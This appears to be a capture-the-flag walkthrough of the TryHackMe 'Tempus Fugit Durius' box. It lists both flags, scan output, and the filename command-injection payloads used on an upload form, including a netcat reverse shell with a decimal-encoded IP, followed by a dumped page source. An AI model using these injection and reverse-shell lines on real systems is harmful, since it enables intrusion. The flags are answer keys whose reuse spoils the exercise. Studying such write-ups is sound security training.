Start Machine
Tempus Fugit is a Latin phrase that roughly translated as “time flies”.
Durius is also latin and means "harder".
This is a remake of Tempus Fugit 1. A bit harder and different from the first one.
It is an intermediate/hard, real life box.
Answer the questions below
What is flag 1?
THM{Nice_Work_Got_Ben_Clower}
What is flag 2?
THM{Great_work!_You_Rooted_TempusFugitDurius!}
[[OWASP API Security Top 10 - 2]]
Last updated
Was this helpful?
Was this helpful?
┌──(kali㉿kali)-[~/Downloads/temple]
└─$ rustscan -a 10.10.238.9 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.238.9:22
Open 10.10.238.9:80
Open 10.10.238.9:111
Open 10.10.238.9:51424
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-26 11:56 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 11:56
Completed Parallel DNS resolution of 1 host. at 11:56, 0.02s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 11:56
Scanning 10.10.238.9 [4 ports]
Discovered open port 22/tcp on 10.10.238.9
Discovered open port 80/tcp on 10.10.238.9
Discovered open port 51424/tcp on 10.10.238.9
Discovered open port 111/tcp on 10.10.238.9
Completed Connect Scan at 11:56, 0.37s elapsed (4 total ports)
Initiating Service scan at 11:56
Scanning 4 services on 10.10.238.9
Completed Service scan at 11:56, 14.15s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.238.9.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:56
Completed NSE at 11:56, 9.20s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:56
Completed NSE at 11:56, 1.21s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Nmap scan report for 10.10.238.9
Host is up, received user-set (0.36s latency).
Scanned at 2023-01-26 11:56:03 EST for 25s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
| 1024 b1aca992d32a699168b46aac4543fbed (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAPWmD4IaPbJQU46GEKX8pUal0IbZzIykktEuUh5boCKMuwsetNGanzNZYFd6eGWRd+zqr6nRnRFQPDiDZtt6DDz7NcJcXliGifQehWEEmskzfhdGSuh+kBUQaqXskCKZi0U/l9P0kvP6bD2SdsXqiYTBGQxN6a4Do1fyE2OoVYgPAAAAFQD4r+hmmsHGFfn0SV1mjGpoHpFwuwAAAIAnnoGwYiWDRAwFoPLkLYWahNwCbLAhVXOb1cnr8NxZN+uRMqEdtoZHNUbTd7ki8j5WpkZhMjFEyZQJg+MNQjUSxISlE1SoBTI8BmAUDAEvgPNyr0CDCS42rAY98JTMhaoZ8FOzgoatLmJWWgWqM+8YHCN4XHoVgm1vMagLsWxW5AAAAIBGW3tnTGis3+eWROnisRfyoo3zawOnd7oijjK7CAiIuxfqc3ESTzeLlkL0QBAIv/1PBGoZSTwg53aZqctO2/BgSNGMWDts3xnqpsEGNyo520Br/cBUyi6rRBotV1kL9tIT4VwdP33F/bjiHHRclfCmOtVYWmkst+HUSqS2yPn1WQ==
| 2048 3a3f9f5929c820d73ac504aa8236683f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0zYWd7C1JANU5TctI7lB/tyS9Aid6x5Dh2PnD7fpz6C9Apv9Y/YJzaCUYgqME41ZDxIIiegV02OSCkKFmXvr9gVVKaFHyUVhQ9Zb3FyQeGgWEL3004HIL+G06afXPlsRzNBb5VoqUte+5bigJT5UkyncAfWn+8bWLnFmuXDi5PZ4Pz0RHx9HzCwJ5G26DogQUI6M0zQkhJHzD+nWdIExvoY1L9UN4oZzCuaUF3Tcel3dDnbgi1RaZlfFi3r5NNUtQ7OVijWnms7nYNN7b77CZZWMhE6yMYI8+3ya99CfzA/oYsHv+t8XSbRyAdm5KvETrD8yoBrE14F2FekQQNggx
| 256 f92fbbe3ab95ee9e787c91187d9584ab (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAOH4ypeTzhthRbvcrzqVbbWXG1imFdejEQIo53fimAkjsOcrmEDWwT7Lskm5qyz4dmhGmfsH90xzOgQ+Bm6Nuk=
| 256 490e6fcbec6ca59767cc3c31ad94a454 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK7iJO0KhscqLrJgy+mvB3Y+5U+WpOiBAxCr4TKu7pJB
80/tcp open http syn-ack nginx 1.6.2
|_http-title: Tempus Fugit Durius
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: nginx/1.6.2
|_http-favicon: Unknown favicon MD5: 135A4C7175BDC2F57863FFE217BDBC31
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 38080/tcp6 status
| 100024 1 41830/udp status
| 100024 1 51424/tcp status
|_ 100024 1 54727/udp6 status
51424/tcp open status syn-ack 1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.46 seconds
┌──(kali㉿kali)-[~/Downloads/gau]
└─$ gobuster dir -u http://10.10.238.9/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -k -x txt,php,py,html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.238.9/
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,php,py,html
[+] Timeout: 10s
===============================================================
2023/01/26 12:20:11 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.238.9/2ae01b2f-77cf-498e-b54b-84dcf27899bc => 200 (Length: 774). To continue please exclude the status code or the length
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ feroxbuster -t 120 -u http://10.10.238.9 -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.7.2
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.238.9
🚀 Threads │ 120
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.7.2
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
WLD GET 7l 81w 483c Got 200 for http://10.10.238.9/c80a238a03ba47b59a03c2ded31653ca (url length: 32)
WLD GET 4l 36w 209c Got 200 for http://10.10.238.9/55e4b434160b41629cbeeee291ad8a18b4d54a5fa5174539983fd6235d8dcdd4383184fe6bff4e138aff0ce9ccd7f2db (url length: 96)
200 GET 3l 27w 189c http://10.10.238.9/crack
200 GET 4l 43w 247c http://10.10.238.9/index
200 GET 3l 28w 178c http://10.10.238.9/images
200 GET 2l 29w 175c http://10.10.238.9/links
200 GET 3l 30w 194c http://10.10.238.9/news
http://10.10.238.9/c80a238a03ba47b59a03c2ded31653ca
400 - Sorry. I didn't find what you where looking for.
Maybe this will cheer you up:
Life would be so much easier if we could just look at the source code.
400 - Sorry. I didn't find what you where looking for.
Maybe this will cheer you up:
Antonym, n.: The opposite of the word you're trying to think of.
400 - Sorry. I didn't find what you where looking for.
Maybe this will cheer you up:
The best defense against logic is ignorance.
400 - Sorry. I didn't find what you where looking for.
Maybe this will cheer you up:
Earth is a beta site.
400 - Sorry. I didn't find what you where looking for.
Maybe this will cheer you up:
Don't let your mind wander -- it's too little to be let out alone.
If God had intended Man to Walk, He would have given him Feet.
we will invent new lullabies, new songs, new acts of love, we will cry over things we used to laugh & our new wisdom will bring tears to eyes of gentile creatures from other planets who were afraid of us till then & in the end a summer with wild winds & new friends will be.
If you're happy, you're successful.
If only one could get that wonderful feeling of accomplishment without having to accomplish anything.
and more quotes
http://10.10.238.9/upload
Allowed file types are txt and rtf
uploading test.txt
hi
File successfully uploaded
using burp
Content-Disposition: form-data; name="file"; filename="test.txt;id"
Do intercept to this request
uid=1000(www) gid=1000(www) groups=1000(www)
File successfully uploaded
revshell
nc 10.8.19.103 443 -e sh
This command uses the "nc" (netcat) command to establish a connection to a remote server on port 443 using TCP. The "-e" flag specifies a command to be executed on the remote system once a connection is established. In this case, the command is "sh", which runs the default shell on the remote system. This command can potentially be used for malicious purposes, such as gaining unauthorized access to a remote system. It is important to use caution when running commands like this and to only use them on systems that you have permission to access.
Content-Disposition: form-data; name="file"; filename="test.txt;nc 10.8.19.103 443 -e sh"
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ rlwrap nc -lvnp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
That filename was way too long!
ip to decimal
https://www.ipaddressguide.com/ip
IP address 10.8.19.103 is equal to **168301415**.
Content-Disposition: form-data; name="file"; filename="a.txt;nc 168301415 443 -e sh"
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ mv test.txt a.txt
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ ls
a.txt test2.txt
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ cat a.txt
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ rlwrap nc -lvnp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.238.9.
Ncat: Connection from 10.10.238.9:58289.
python3 -c 'import pty;pty.spawn("/bin/bash")'
bash: /root/.bashrc: Permission denied
bash-4.4$ whoami
whoami
www
bash-4.4$ ls
ls
__pycache__ main.py supervisord.pid uwsgi.ini
debug prestart.sh templates
index.html static upload
or another way
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ mv a.txt "a.txt;nc 168301415 443 -e sh"
upload it
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ rlwrap nc -lvnp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.238.9.
Ncat: Connection from 10.10.238.9:35704.
whoami
www
python3 -c 'import pty;pty.spawn("/bin/bash")'
bash: /root/.bashrc: Permission denied
bash-4.4$ cat index.html
cat index.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<title>Tempus Fugit Durius</title>
<!-- Custom fonts for this theme -->
<link href="static/css/000058all.min.css" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Lato:400,700,400italic,700italic" rel="stylesheet" type="text/css">
<!-- Theme CSS -->
<link href="static/css/000010freelancer.min.css" rel="stylesheet">
</head>
<body id="page-top">
<!-- Navigation -->
<nav class="navbar navbar-expand-lg bg-secondary text-uppercase fixed-top" id="mainNav">
<div class="container">
<a class="navbar-brand js-scroll-trigger" href="#page-top">Tempus Fugit Durius</a>
<button class="navbar-toggler navbar-toggler-right text-uppercase font-weight-bold bg-primary text-white rounded" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
Menu
<i class="fas fa-bars"></i>
</button>
<div class="collapse navbar-collapse" id="navbarResponsive">
<ul class="navbar-nav ml-auto">
<li class="nav-item mx-0 mx-lg-1">
<a class="nav-link py-3 px-0 px-lg-3 rounded js-scroll-trigger" href="#portfolio">Stuff</a>
</li>
<li class="nav-item mx-0 mx-lg-1">
<a class="nav-link py-3 px-0 px-lg-3 rounded js-scroll-trigger" href="#about">About</a>
</li>
<li class="nav-item mx-0 mx-lg-1">
<a class="nav-link py-3 px-0 px-lg-3 rounded js-scroll-trigger" href="#contact">Contact</a>
</li>
<li class="nav-item mx-0 mx-lg-1">
<a class="nav-link py-3 px-0 px-lg-3 rounded js-scroll-trigger" href="/upload">Upload</a>
</li>
</ul>
</div>
</div>
</nav>
<!-- Masthead -->
<header class="masthead bg-primary text-white text-center">
<div class="container d-flex align-items-center flex-column">
<!-- Masthead Avatar Image -->
<img class="masthead-avatar mb-5" src="static/img/evil.png" alt="">
<!-- Masthead Heading -->
<h1 class="masthead-heading text-uppercase mb-0">Tempus Fugit Durius</h1>
<!-- Icon Divider -->
<div class="divider-custom divider-light">
<div class="divider-custom-line"></div>
<div class="divider-custom-icon">
<i class="fas fa-star"></i>
</div>
<div class="divider-custom-line"></div>
</div>
<!-- Masthead Subheading -->
<p class="masthead-subheading font-weight-light mb-0">By 4ndr34z</p>
</div>
</header>
<!-- Portfolio Section -->
<section class="page-section portfolio" id="portfolio">
<div class="container">
<!-- Portfolio Section Heading -->
<h2 class="page-section-heading text-center text-uppercase text-secondary
mb-0">Stuff</h2>
<!-- Icon Divider -->
<div class="divider-custom">
<div class="divider-custom-line"></div>
<div class="divider-custom-icon">
<i class="fas fa-star"></i>
</div>
<div class="divider-custom-line"></div>
</div>
<!-- Portfolio Grid Items -->
<div class="row">
<!-- Portfolio Item 1 -->
<div class="col-md-6 col-lg-4">
<div class="portfolio-item mx-auto" data-toggle="modal" data-target="#portfolioModal1">
<div class="portfolio-item-caption d-flex align-items-center justify-content-center h-100 w-100">
<div class="portfolio-item-caption-content text-center text-white">
<i class="fas fa-plus fa-3x"></i>
</div>
</div>
<img class="img-fluid" src="static/img/000034cabin.png" alt="">
</div>
</div>
<!-- Portfolio Item 2 -->
<div class="col-md-6 col-lg-4">
<div class="portfolio-item mx-auto" data-toggle="modal" data-target="#portfolioModal2">
<div class="portfolio-item-caption d-flex align-items-center justify-content-center h-100 w-100">
<div class="portfolio-item-caption-content text-center text-white">
<i class="fas fa-plus fa-3x"></i>
</div>
</div>
<img class="img-fluid" src="static/img/000029cake.png" alt="">
</div>
</div>
<!-- Portfolio Item 3 -->
<div class="col-md-6 col-lg-4">
<div class="portfolio-item mx-auto" data-toggle="modal" data-target="#portfolioModal3">
<div class="portfolio-item-caption d-flex align-items-center justify-content-center h-100 w-100">
<div class="portfolio-item-caption-content text-center text-white">
<i class="fas fa-plus fa-3x"></i>
</div>
</div>
<img class="img-fluid" src="static/img/000032circus.png" alt="">
</div>
</div>
<!-- Portfolio Item 4 -->
<div class="col-md-6 col-lg-4">
<div class="portfolio-item mx-auto" data-toggle="modal" data-target="#portfolioModal4">
<div class="portfolio-item-caption d-flex align-items-center justify-content-center h-100 w-100">
<div class="portfolio-item-caption-content text-center text-white">
<i class="fas fa-plus fa-3x"></i>
</div>
</div>
<img class="img-fluid" src="static/img/000030game.png" alt="">
</div>
</div>
<!-- Portfolio Item 5 -->
<div class="col-md-6 col-lg-4">
<div class="portfolio-item mx-auto" data-toggle="modal" data-target="#portfolioModal5">
<div class="portfolio-item-caption d-flex align-items-center justify-content-center h-100 w-100">
<div class="portfolio-item-caption-content text-center text-white">
<i class="fas fa-plus fa-3x"></i>
</div>
</div>
<img class="img-fluid" src="static/img/000031safe.png" alt="">
</div>
</div>
<!-- Portfolio Item 6 -->
<div class="col-md-6 col-lg-4">
<div class="portfolio-item mx-auto" data-toggle="modal" data-target="#portfolioModal6">
<div class="portfolio-item-caption d-flex align-items-center justify-content-center h-100 w-100">
<div class="portfolio-item-caption-content text-center text-white">
<i class="fas fa-plus fa-3x"></i>
</div>
</div>
<img class="img-fluid" src="static/img/000033submarine.png" alt="">
</div>
</div>
</div>
<!-- /.row -->
</div>
</section>
<!-- About Section -->
<section class="page-section bg-primary text-white mb-0" id="about">
<div class="container">
<!-- About Section Heading -->
<h2 class="page-section-heading text-center text-uppercase text-white">About</h2>
<!-- Icon Divider -->
<div class="divider-custom divider-light">
<div class="divider-custom-line"></div>
<div class="divider-custom-icon">
<i class="fas fa-star"></i>
</div>
<div class="divider-custom-line"></div>
</div>
<!-- About Section Content -->
<div class="row">
<div class="col-lg-4 ml-auto">
<p class="lead">Tempus Fugit is a Latin phrase, usually
translated into English as "time flies". When writing
scripts, that is usually very true...
This site is for you to upload your scripts for safekeeping on our internal FTP-server. </p>
</div>
<div class="col-lg-4 mr-auto">
<p class="lead"></p>
</div>
</div>
<!-- About Section Button -->
<div class="text-center mt-4">
</div>
</div>
</section>
<!-- Contact Section -->
<section class="page-section" id="contact">
<div class="container">
<!-- Contact Section Heading -->
<h2 class="page-section-heading text-center text-uppercase text-secondary mb-0">Contact Us</h2>
<!-- Icon Divider -->
<div class="divider-custom">
<div class="divider-custom-line"></div>
<div class="divider-custom-icon">
<i class="fas fa-star"></i>
</div>
<div class="divider-custom-line"></div>
</div>
<!-- Contact Section Form -->
<div class="row">
<div class="col-lg-8 mx-auto">
<!-- To configure the contact form email address, go to mail/contact_me.php and update the email address in the PHP file on line 19. -->
<form name="sentMessage" id="contactForm" novalidate="novalidate">
<div class="control-group">
<div class="form-group floating-label-form-group controls mb-0 pb-2">
<label>Name</label>
<input class="form-control" id="name" type="text" placeholder="Name" required="required" data-validation-required-message="Please enter your name.">
<p class="help-block text-danger"></p>
</div>
</div>
<div class="control-group">
<div class="form-group floating-label-form-group controls mb-0 pb-2">
<label>Email Address</label>
<input class="form-control" id="email" type="email" placeholder="Email Address" required="required" data-validation-required-message="Please enter your email address.">
<p class="help-block text-danger"></p>
</div>
</div>
<div class="control-group">
<div class="form-group floating-label-form-group controls mb-0 pb-2">
<label>Phone Number</label>
<input class="form-control" id="phone" type="tel" placeholder="Phone Number" required="required" data-validation-required-message="Please enter your phone number.">
<p class="help-block text-danger"></p>
</div>
</div>
<div class="control-group">
<div class="form-group floating-label-form-group controls mb-0 pb-2">
<label>Message</label>
<textarea class="form-control" id="message" rows="5" placeholder="Message" required="required" data-validation-required-message="Please enter a message."></textarea>
<p class="help-block text-danger"></p>
</div>
</div>
<br>
<div id="success"></div>
<div class="form-group">
<button type="submit" class="btn btn-primary btn-xl" id="sendMessageButton">Send</button>
</div>
</form>
</div>
</div>
</div>
</section>
<!-- Footer -->
<footer class="footer text-center">
<div class="container">
<div class="row">
<!-- Footer Location -->
<div class="col-lg-4 mb-5 mb-lg-0">
<h4 class="text-uppercase mb-4">Location</h4>
<p class="lead mb-0">2215 John Daniel Drive
<br>Clark, MO 65243</p>
</div>
<!-- Footer Social Icons -->
<div class="col-lg-4 mb-5 mb-lg-0">
<h4 class="text-uppercase mb-4">Around the Web</h4>
<a class="btn btn-outline-light btn-social mx-1" href="#">
<i class="fab fa-fw fa-facebook-f"></i>
</a>
<a class="btn btn-outline-light btn-social mx-1" href="#">
<i class="fab fa-fw fa-twitter"></i>
</a>
<a class="btn btn-outline-light btn-social mx-1" href="#">
<i class="fab fa-fw fa-linkedin-in"></i>
</a>
<a class="btn btn-outline-light btn-social mx-1" href="#">
<i class="fab fa-fw fa-dribbble"></i>
</a>
</div>
<!-- Footer About Text -->
<div class="col-lg-4">
<h4 class="text-uppercase mb-4">About Freelancer</h4>
<p class="lead mb-0">Freelance is a free to use, MIT licensed Bootstrap theme created by
<a href="http://startbootstrap.com">Start Bootstrap</a>.</p>
</div>
</div>
</div>
</footer>
<!-- Copyright Section -->
<section class="copyright py-4 text-center text-white">
<div class="container">
<small>Copyright © Your Website 2019</small>
</div>
</section>
<!-- Scroll to Top Button (Only visible on small and extra-small screen sizes) -->
<div class="scroll-to-top d-lg-none position-fixed ">
<a class="js-scroll-trigger d-block text-center text-white rounded" href="#page-top">
<i class="fa fa-chevron-up"></i>
</a>
</div>
<!-- Portfolio Modals -->
<!-- Portfolio Modal 1 -->
<div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-labelledby="portfolioModal1Label" aria-hidden="true">
<div class="modal-dialog modal-xl" role="document">
<div class="modal-content">
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">
<i class="fas fa-times"></i>
</span>
</button>
<div class="modal-body text-center">
<div class="container">
<div class="row justify-content-center">
<div class="col-lg-8">
<!-- Portfolio Modal - Title -->
<h2 class="portfolio-modal-title text-secondary text-uppercase mb-0">Log Cabin</h2>
<!-- Icon Divider -->
<div class="divider-custom">
<div class="divider-custom-line"></div>
<div class="divider-custom-icon">
<i class="fas fa-star"></i>
</div>
<div class="divider-custom-line"></div>
</div>
<!-- Portfolio Modal - Image -->
<img class="img-fluid rounded mb-5" src="static/img/000034cabin.png" alt="">
<!-- Portfolio Modal - Text -->
<p class="mb-5">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Mollitia neque assumenda ipsam nihil, molestias magnam, recusandae quos quis inventore quisquam velit asperiores, vitae? Reprehenderit soluta, eos quod consequuntur itaque. Nam.</p>
<button class="btn btn-primary" href="#" data-dismiss="modal">
<i class="fas fa-times fa-fw"></i>
Close Window
</button>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- Portfolio Modal 2 -->
<div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-labelledby="portfolioModal2Label" aria-hidden="true">
<div class="modal-dialog modal-xl" role="document">
<div class="modal-content">
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">
<i class="fas fa-times"></i>
</span>
</button>
<div class="modal-body text-center">
<div class="container">
<div class="row justify-content-center">
<div class="col-lg-8">
<!-- Portfolio Modal - Title -->
<h2 class="portfolio-modal-title text-secondary text-uppercase mb-0">Tasty Cake</h2>
<!-- Icon Divider -->
<div class="divider-custom">
<div class="divider-custom-line"></div>
<div class="divider-custom-icon">
<i class="fas fa-star"></i>
</div>
<div class="divider-custom-line"></div>
</div>
<!-- Portfolio Modal - Image -->
<img class="img-fluid rounded mb-5" src="static/img/000029cake.png" alt="">
<!-- Portfolio Modal - Text -->
<p class="mb-5">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Mollitia neque assumenda ipsam nihil, molestias magnam, recusandae quos quis inventore quisquam velit asperiores, vitae? Reprehenderit soluta, eos quod consequuntur itaque. Nam.</p>
<button class="btn btn-primary" href="#" data-dismiss="modal">
<i class="fas fa-times fa-fw"></i>
Close Window
</button>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- Portfolio Modal 3 -->
<div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-labelledby="portfolioModal3Label" aria-hidden="true">
<div class="modal-dialog modal-xl" role="document">
<div class="modal-content">
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">
<i class="fas fa-times"></i>
</span>
</button>
<div class="modal-body text-center">
<div class="container">
<div class="row justify-content-center">
<div class="col-lg-8">
<!-- Portfolio Modal - Title -->
<h2 class="portfolio-modal-title text-secondary text-uppercase mb-0">Circus Tent</h2>
<!-- Icon Divider -->
<div class="divider-custom">
<div class="divider-custom-line"></div>
<div class="divider-custom-icon">
<i class="fas fa-star"></i>
</div>
<div class="divider-custom-line"></div>
</div>
<!-- Portfolio Modal - Image -->
<img class="img-fluid rounded mb-5" src="static/img/000032circus.png" alt="">
<!-- Portfolio Modal - Text -->
<p class="mb-5">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Mollitia neque assumenda ipsam nihil, molestias magnam, recusandae quos quis inventore quisquam velit asperiores, vitae? Reprehenderit soluta, eos quod consequuntur itaque. Nam.</p>
<button class="btn btn-primary" href="#" data-dismiss="modal">
<i class="fas fa-times fa-fw"></i>
Close Window
</button>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- Portfolio Modal 4 -->
<div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-labelledby="portfolioModal4Label" aria-hidden="true">
<div class="modal-dialog modal-xl" role="document">
<div class="modal-content">
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">
<i class="fas fa-times"></i>
</span>
</button>
<div class="modal-body text-center">
<div class="container">
<div class="row justify-content-center">
<div class="col-lg-8">
<!-- Portfolio Modal - Title -->
<h2 class="portfolio-modal-title text-secondary text-uppercase mb-0">Controller</h2>
<!-- Icon Divider -->
<div class="divider-custom">
<div class="divider-custom-line"></div>
<div class="divider-custom-icon">
<i class="fas fa-star"></i>
</div>
<div class="divider-custom-line"></div>
</div>
<!-- Portfolio Modal - Image -->
<img class="img-fluid rounded mb-5" src="static/img/000030game.png" alt="">
<!-- Portfolio Modal - Text -->
<p class="mb-5">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Mollitia neque assumenda ipsam nihil, molestias magnam, recusandae quos quis inventore quisquam velit asperiores, vitae? Reprehenderit soluta, eos quod consequuntur itaque. Nam.</p>
<button class="btn btn-primary" href="#" data-dismiss="modal">
<i class="fas fa-times fa-fw"></i>
Close Window
</button>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- Portfolio Modal 5 -->
<div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-labelledby="portfolioModal5Label" aria-hidden="true">
<div class="modal-dialog modal-xl" role="document">
<div class="modal-content">
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">
<i class="fas fa-times"></i>
</span>
</button>
<div class="modal-body text-center">
<div class="container">
<div class="row justify-content-center">
<div class="col-lg-8">
<!-- Portfolio Modal - Title -->
<h2 class="portfolio-modal-title text-secondary text-uppercase mb-0">Locked Safe</h2>
<!-- Icon Divider -->
<div class="divider-custom">
<div class="divider-custom-line"></div>
<div class="divider-custom-icon">
<i class="fas fa-star"></i>
</div>
<div class="divider-custom-line"></div>
</div>
<!-- Portfolio Modal - Image -->
<img class="img-fluid rounded mb-5" src="static/img/000031safe.png" alt="">
<!-- Portfolio Modal - Text -->
<p class="mb-5">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Mollitia neque assumenda ipsam nihil, molestias magnam, recusandae quos quis inventore quisquam velit asperiores, vitae? Reprehenderit soluta, eos quod consequuntur itaque. Nam.</p>
<button class="btn btn-primary" href="#" data-dismiss="modal">
<i class="fas fa-times fa-fw"></i>
Close Window
</button>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- Portfolio Modal 6 -->
<div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-labelledby="portfolioModal6Label" aria-hidden="true">
<div class="modal-dialog modal-xl" role="document">
<div class="modal-content">
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">
<i class="fas fa-times"></i>
</span>
</button>
<div class="modal-body text-center">
<div class="container">
<div class="row justify-content-center">
<div class="col-lg-8">
<!-- Portfolio Modal - Title -->
<h2 class="portfolio-modal-title text-secondary text-uppercase mb-0">Submarine</h2>
<!-- Icon Divider -->
<div class="divider-custom">
<div class="divider-custom-line"></div>
<div class="divider-custom-icon">
<i class="fas fa-star"></i>
</div>
<div class="divider-custom-line"></div>
</div>
<!-- Portfolio Modal - Image -->
<img class="img-fluid rounded mb-5" src="static/img/000033submarine.png" alt="">
<!-- Portfolio Modal - Text -->
